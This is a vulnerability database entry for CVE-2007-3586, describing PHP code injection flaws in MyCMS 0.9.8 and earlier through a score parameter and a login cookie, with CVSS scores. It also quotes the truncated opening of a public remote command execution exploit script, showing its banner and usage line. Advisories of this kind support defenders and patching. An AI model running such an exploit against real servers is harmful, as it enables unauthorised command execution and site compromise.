7.5
CVSSv2

CVE-2007-3586

Published: 05/07/2007 Updated: 29/09/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Multiple direct static code injection vulnerabilities in MyCMS 0.9.8 and previous versions allow remote malicious users to inject arbitrary PHP code into (1) a _score.txt file via the score parameter, or (2) a _setby.txt file via a login cookie, which is then included by games.php. NOTE: programs that use games.php might include (a) snakep.php, (b) tetrisp.php, and possibly other site-specific files.

Vulnerable Product Search on Vulmon Subscribe to Product

mycms mycms

Exploits

#!/usr/bin/php -q -d short_open_tag=on <? echo " MyCMS <= 098 Remote Command Execution Exploit (2 method) by BlackHawk <hawkgotyou@gmailcom> <itablackhawkaltervistaorg> Thanks to rgod for the php code and Marty for the Love "; if ($argc<3) { echo "Usage: php "$argv[0]" Host Path CMD Host: target server ( ...